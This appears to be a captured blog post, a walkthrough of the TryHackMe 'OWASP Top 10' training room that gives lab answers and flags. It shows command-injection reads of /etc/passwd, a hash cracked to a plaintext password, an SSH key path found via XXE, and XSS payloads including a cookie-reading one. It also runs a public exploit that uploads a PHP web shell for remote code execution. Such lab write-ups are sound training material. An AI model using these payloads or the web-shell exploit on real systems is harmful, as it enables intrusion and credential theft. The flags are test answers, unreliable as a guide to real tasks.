blog.raw.pm Open in urlscan Pro
35.185.44.232  Public Scan

URL: https://blog.raw.pm/en/TryHackMe-OWASP-Top-10-write-up/
Submission: On August 23 via manual from PL — Scanned from DE

Form analysis 1 forms found in the DOM

<form class="search-form">
  <input type="text" class="ins-search-input search-form-input" placeholder="Search">
  <button type="submit" class="search-form-submit"></button>
</form>

Text Content

 * Linux
 * Security
 * Write-ups
   * CTF HackTheBox TryHackMe
 * Tags
 * Categories
 * About
   * Authors noraj Inventory Write-up Factory THTT Domains




WRITEUPS


OWASP TOP 10 - WRITE-UP - TRYHACKME

Saturday 14 November 2020 (2020-11-14)
Thursday 4 August 2022 (2022-08-04)
noraj (Alexandre ZANNI)
eop, idor, linux, owasp, thm, web, writeups, xxe


INFORMATION


ROOM#

 * Name: OWASP Top 10
 * Profile: tryhackme.com
 * Difficulty: Easy
 * Description: Learn about and exploit each of the OWASP Top 10
   vulnerabilities; the 10 most critical web security risks.

OWASP Top 10


WRITE-UP


OVERVIEW#

Install tools used in this WU on BlackArch Linux:

1


$ sudo pacman -S exploitdb dbeaver python



[DAY 1] COMMAND INJECTION PRACTICAL#


#1#

> What strange text file is in the website root directory?

Answer: drpepper.txt

Issue the ls command to list files.

1


css drpepper.txt evilshell.php index.php js



#2#

> How many non-root/non-service/non-daemon users are there?

Answer: 0

Issue the cat /etc/passwd command, it seems there is no
non-root/non-service/non-daemon users.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin



#3#

> What user is this app running as?

Answer: www-data

Issue the id command.

1


uid=33(www-data) gid=33(www-data) groups=33(www-data)



#4#

> What is the user's shell set as?

Answer: /usr/sbin/nologin

echo $SHELL returns nothing, so let's try cat /etc/passwd | grep www-data | cut
-d ':' -f 7.

1


/usr/sbin/nologin



#5#

> What version of Ubuntu is running?

Answer: 18.04.4

Run cat /etc/os-release.

1
2
3
4
5
6
7
8
9
10
11


VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic



#6#

> Print out the MOTD. What favorite beverage is shown?

Answer: DR PEPPER

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45


$ ls -1 /etc/update-motd.d/
10-help-text
50-landscape-sysinfo
50-motd-news
80-esm
80-livepatch
90-updates-available
91-release-upgrade
92-unattended-upgrades
95-hwe-eol
97-overlayroot
98-fsck-at-reboot
98-reboot-required

$ cat /etc/update-motd.d/00-header
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
	# Fall back to using the very slow lsb_release utility
	DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"

DR PEPPER MAKES THE WORLD TASTE BETTER!



[DAY 2] BROKEN AUTHENTICATION PRACTICAL#


#1#

> What is the flag that you found in darren's account?

Register as darren and log in.

Answer: fe86079416a21a3c99937fea8874b667


#3#

> What is the flag that you found in arthur's account?

Register as arthur and log in.

Answer: d9ac0f7db4fda460ac3edeb75d75e16e


[DAY 3] SENSITIVE DATA EXPOSURE (CHALLENGE)#


#1#

> Have a look around the webapp. The developer has left themselves a note
> indicating that there is sensitive data in a specific directory.
> 
> What is the name of the mentioned directory?

Answer: /assets


#2#

> Navigate to the directory you found in question one. What file stands out as
> being likely to contain sensitive data?

Answer: webapp.db


#3#

> Use the supporting material to access the sensitive data. What is the password
> hash of the admin user?

Answer: 6eea9b7ef19179a06954edd0f6c05ceb

Open the DB with dbeaver.


#4#

> Crack the hash. What is the admin's plaintext password?

Answer: qwertyuiop

Crack the password with crackstation.


#5#

> Login as the admin. What is the flag?

Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}


[DAY 4] XML EXTERNAL ENTITY - EXTENSIBLE MARKUP LANGUAGE#


#1#

> Full form of XML

Answer: eXtensible Markup Language


#2#

> Is it compulsory to have XML prolog in XML documents?

Answer: no


#3#

> Can we validate XML documents against a schema?

Answer: yes


4#

> How can we specify XML version and encoding in XML document?

Answer: XML Prolog


[DAY 4] XML EXTERNAL ENTITY - DTD#


#1#

> How do you define a new ELEMENT?

Answer: !ELEMENT


#2#

> How do you define a ROOT element?

Answer: !DOCTYPE


#3#

> How do you define a new ENTITY?

Answer: !ENTITY


[DAY 4] XML EXTERNAL ENTITY - EXPLOITING#


#3#

> What is the name of the user in /etc/passwd

Answer: falcon


#4#

> Where is falcon's SSH key located?

Answer: /home/falcon/.ssh/id_rsa


#5#

> What are the first 18 characters for falcon's private key

Answer: MIIEogIBAAKCAQEA7b


[DAY 5] BROKEN ACCESS CONTROL (IDOR CHALLENGE)#


#3#

> Look at other users notes. What is the flag?

http://10.10.125.211/note.php?note=0

Answer: flag{fivefourthree}


[DAY 6] SECURITY MISCONFIGURATION#


#2#

> Hack into the webapp, and find the flag!

https://github.com/NinjaJc01/PensiveNotes

Answer: thm{4b9513968fd564a87b28aa1f9d672e17}


[DAY 7] CROSS-SITE SCRIPTING#


#2#

> Go to http://10.10.93.135/reflected and craft a reflected XSS payload that
> will cause a popup saying "Hello".

Answer: ThereIsMoreToXSSThanYouThink

1


<script>alert("Hello")</script>



#3#

> On the same reflective page, craft a reflected XSS payload that will cause a
> popup with your machines IP address.

1


<script>alert(window.location.hostname)</script>


Answer: ReflectiveXss4TheWin


#4#

> Now navigate to http://10.10.93.135/stored and make an account.
> 
> Then add a comment and see if you can insert some of your own HTML.

1


<b>noraj is bold</b>


Answer: HTML_T4gs


#5#

> On the same page, create an alert popup box appear on the page with your
> document cookies.

1


<script>alert(document.cookies)</script>


Answer: W3LL_D0N3_LVL2s


#6#

> Change "XSS Playground" to "I am a hacker" by adding a comment and using
> Javascript.

1


<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>


Answer: websites_can_be_easily_defaced_with_xss


[DAY 8] INSECURE DESERIALIZATION#


#1#

> Who developed the Tomcat application?

Answer: The Apache Software Fundation


#2#

> What type of attack that crashes services can be performed with insecure
> deserialization?

Answer: denial of service


[DAY 8] INSECURE DESERIALIZATION - OBJECTS#


#1#

> Select the correct term of the following statement:

Answer: A Behaviour


[DAY 8] INSECURE DESERIALIZATION - DESERIALIZATION#


#1#

> What is the name of the base-2 formatting that data is sent across a network
> as?

Answer: binary


[DAY 8] INSECURE DESERIALIZATION - COOKIES#


#1#

> If a cookie had the path of webapp.com/login , what would the URL that the
> user has to visit be?

Answer: webapp.com/login


#2#

> What is the acronym for the web technology that Secure cookies work over?

Answer: HTTPS


[DAY 8] INSECURE DESERIALIZATION - COOKIES PRACTICAL#


#1#

> 1st flag (cookie value)

Answer: THM{good_old_base64_huh}

1
2
3


$ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d
}q(X    sessionIdqX c7dc44838e0847b1b45544948a92d194qX
                                                      encodedflagqXTHM{good_old_base64_huh}qu.



#2#

> 2nd flag (admin dashboard)

Answer: THM{heres_the_admin_flag}


[DAY 8] INSECURE DESERIALIZATION - REMOTE CODE EXECUTION#


#1#

> flag.txt

Answer: 4a69a7ff9fd68


[DAY 9] COMPONENTS WITH KNOWN VULNERABILITIES - LAB#

> How many characters are in /etc/passwd (use wc -c /etc/passwd to get the
> answer)

Answer: 1611

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35


$ searchsploit CSE bookstore
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting                      | php/webapps/48973.txt
CSE Bookstore 1.0 - Authentication Bypass                                           | php/webapps/48960.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit online book store
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
GotoCode Online Bookstore - Multiple Vulnerabilities                                | asp/webapps/17921.txt
Online Book Store 1.0 - 'bookisbn' SQL Injection                                    | php/webapps/47922.txt
Online Book Store 1.0 - 'id' SQL Injection                                          | php/webapps/48775.txt
Online Book Store 1.0 - Arbitrary File Upload                                       | php/webapps/47928.txt
Online Book Store 1.0 - Unauthenticated Remote Code Execution                       | php/webapps/47887.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit -p 47887
  Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47887
     Path: /usr/share/exploitdb/exploits/php/webapps/47887.py
File Type: ASCII text, with CRLF line terminators

$ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php
> Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ wc -c /etc/passwd
1611 /etc/passwd



[DAY 10] INSUFFICIENT LOGGING AND MONITORING#

> What IP address is the attacker using?

Answer: 49.99.13.16

> What kind of attack is being carried out?

Answer: brute force

Share


follow:

 * 
 * 
 * 
 * 
 * 

newer

Google Dorking - Write-up - TryHackMe

older

Daily Bugle - Write-up - TryHackMe


CATALOG

 1. 1. Information
    1. 1.1. Room
 2. 2. Write-up
    1.  2.1. Overview
    2.  2.2. [Day 1] Command Injection Practical
        1. 2.2.1. #1
        2. 2.2.2. #2
        3. 2.2.3. #3
        4. 2.2.4. #4
        5. 2.2.5. #5
        6. 2.2.6. #6
    3.  2.3. [Day 2] Broken Authentication Practical
        1. 2.3.1. #1
        2. 2.3.2. #3
    4.  2.4. [Day 3] Sensitive Data Exposure (Challenge)
        1. 2.4.1. #1
        2. 2.4.2. #2
        3. 2.4.3. #3
        4. 2.4.4. #4
        5. 2.4.5. #5
    5.  2.5. [Day 4] XML External Entity - eXtensible Markup Language
        1. 2.5.1. #1
        2. 2.5.2. #2
        3. 2.5.3. #3
        4. 2.5.4. 4
    6.  2.6. [Day 4] XML External Entity - DTD
        1. 2.6.1. #1
        2. 2.6.2. #2
        3. 2.6.3. #3
    7.  2.7. [Day 4] XML External Entity - Exploiting
        1. 2.7.1. #3
        2. 2.7.2. #4
        3. 2.7.3. #5
    8.  2.8. [Day 5] Broken Access Control (IDOR Challenge)
        1. 2.8.1. #3
    9.  2.9. [Day 6] Security Misconfiguration
        1. 2.9.1. #2
    10. 2.10. [Day 7] Cross-site Scripting
        1. 2.10.1. #2
        2. 2.10.2. #3
        3. 2.10.3. #4
        4. 2.10.4. #5
        5. 2.10.5. #6
    11. 2.11. [Day 8] Insecure Deserialization
        1. 2.11.1. #1
        2. 2.11.2. #2
    12. 2.12. [Day 8] Insecure Deserialization - Objects
        1. 2.12.1. #1
    13. 2.13. [Day 8] Insecure Deserialization - Deserialization
        1. 2.13.1. #1
    14. 2.14. [Day 8] Insecure Deserialization - Cookies
        1. 2.14.1. #1
        2. 2.14.2. #2
    15. 2.15. [Day 8] Insecure Deserialization - Cookies Practical
        1. 2.15.1. #1
        2. 2.15.2. #2
    16. 2.16. [Day 8] Insecure Deserialization - Remote Code Execution
        1. 2.16.1. #1
    17. 2.17. [Day 9] Components With Known Vulnerabilities - Lab
    18. 2.18. [Day 10] Insufficient Logging and Monitoring


RECENTS

 * linuxandroid
   
   Android OTA payload dumping / extraction: 4 tools review
   
   Wednesday 3 August 2022 (2022-08-03)

 * linuxdebian
   
   QEMU/KVM/Virt-Manager guest support on Debian
   
   Friday 10 June 2022 (2022-06-10)

 * linuxarchlinux
   
   Install QEMU/KVM/Virt-Manager on ArchLinux
   
   Wednesday 1 June 2022 (2022-06-01)

 * linuxandroid
   
   Install LineageOS 19.1 on POCO F3 to replace MIUI 13.0.4
   
   Monday 30 May 2022 (2022-05-30)

 * linuxandroid
   
   Root POCO F3 using Magisk from Linux
   
   Monday 30 May 2022 (2022-05-30)


CATEGORIES

 * linux44
   * android3
   * archlinux17
   * debian2
   * opensuse7
 * misc10
 * programming6
   * c1
   * python2
   * ruby2
 * security26
   * centos2
   * linux1
   * news5
   * windows4
 * windows4
 * writeups297


TAG CLOUD

AWS CVE IoT adctivedirectory android anonymity apache api archlinux azure
backdoor bash bruteforce bsd burp bypass c cache centos cgi cloud cms code
code-review cracking cron crypto cryptography crytpo csrf ctf cve debian
deserialization desirialize devops dns docker dotnet eop event exploit
exploitation extension fail2ban firefox flask forensics ftp gem git github
gitlab gopher graphic guessing hash hijacking htb http hyper-v idor imagetragick
imap jail jar java javascript jinja joy json kvm laravel lfi libraries lineageos
linux log4j lua memcache metadata metasploit misc mobile mongodb motd msf nessus
netbios netlify network news nfs nginx nikto nmap nodejs nosql omi open redirect
opensuse osint otp owasp pacman pastejacking pcap pentest perl php pickle piracy
pivoting powershell privacy programming proxy pwn python qbittorrent qemu
race-condition rails raspberry-pi rce recon redis reverse root rpc rsync
rtorrent ruby rzsh samba security service services shell smb smtp splunk sql
sqli ssh ssrf ssti stegano sudo suid svn system thm tmux tomcat tor totp trivia
update usenet user-agent virtualbox virtualization vpn vulnerability warez web
webshell windows winrm wireshark wordpress writeups xss xxe zaproxy


LINKS

 * Hexo
 * FOSS
 * EFF
 * Tor
 * I2P
 * Gitlab
 * ZeroDisclo
 * Bugcrowd
 * Hackerone

© 2022 Alexandre ZANNI


Posts
Android OTA payload dumping / extraction: 4 tools review

Introduction# Anyone that already tried to root their phone using Magisk's
Patching Images method would have already encountered this issue. Magisk's

QEMU/KVM/Virt-Manager guest support on Debian

I wrote a more detailed article Install QEMU/KVM/Virt-Manager on ArchLinux but
here I will focus on installing guest additions for QEMU/KVM on Debian.

Install QEMU/KVM/Virt-Manager on ArchLinux

Intro# In short QEMU is an emulator, KVM is a special mode of QEMU to support
virtualization. KVM, Kernel-based Virtual Machine, is a hypervisor built

Install LineageOS 19.1 on POCO F3 to replace MIUI 13.0.4

Disclaimer: those are basically the steps described on the LineageOS wiki. Check
the wiki for updated information. Prerequisites# Phone unlocked (OEM

Root POCO F3 using Magisk from Linux

Disclaimer: for advanced power user only. If you don't understand what your are
doing, then don't do it. Prerequisites# Phone unlocked (OEM unlock / M

Pages
HTTP Error 404 - Not Found

123456███████╗██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██╗
██╗██╔════╝██╔══██╗██╔══██╗██╔═══██╗██╔══██╗ ██║ ██║██╔═████╗██║ ██║█████╗
██████╔╝█

Authors
Categories
Domains

Official domain names of Rawsec services. The blog: URL Description
https://blog.raw.pm/ Main domain https://rawsec.ml/ Backup domain
https://rawsec.g

Tags
Categories
linuxlinux
androidlinux/android
debianlinux/debian
archlinuxlinux/archlinux
writeupswriteups
Tags
linuxlinux
androidandroid
virtualizationvirtualization
systemsystem
debiandebian